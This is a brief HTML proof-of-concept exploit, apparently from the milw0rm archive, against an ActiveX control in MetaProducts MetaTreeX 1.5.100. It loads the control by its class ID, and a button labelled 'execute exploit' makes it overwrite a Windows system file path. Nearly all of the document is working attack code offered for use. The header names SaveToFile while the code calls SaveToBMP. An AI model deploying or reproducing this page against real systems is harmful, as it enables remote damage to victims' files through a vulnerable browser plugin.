<HTML>
<BODY>
<b>
Author : Houssamix <br/> <br/> <br/>
MetaProducts MetaTreeX V 1.5.100 Remote File Overwrite Exploit <br/>
Note : SaveToFile() is vuln to <br/>
<b/>
<object id=hsmx classid="clsid:{67E66985-F81A-11D6-BC0F-F7B40157DC26}"></object>
<SCRIPT>
/*
Report for Clsid: {67E66985-F81A-11D6-BC0F-F7B40157DC26}
RegKey Safe for Script: Faux
RegKey Safe for Init: Faux
Implements IObjectSafety: Vrai
IDisp Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
*/
function hehe()
{
File = "c:\\windows\\system_.ini"
hsmx.SaveToBMP(File)
}
</SCRIPT>
<input language=JavaScript onclick=hehe() type=button value="execute exploit"><br>
</body>
</HTML>
# milw0rm.com [2009-01-16]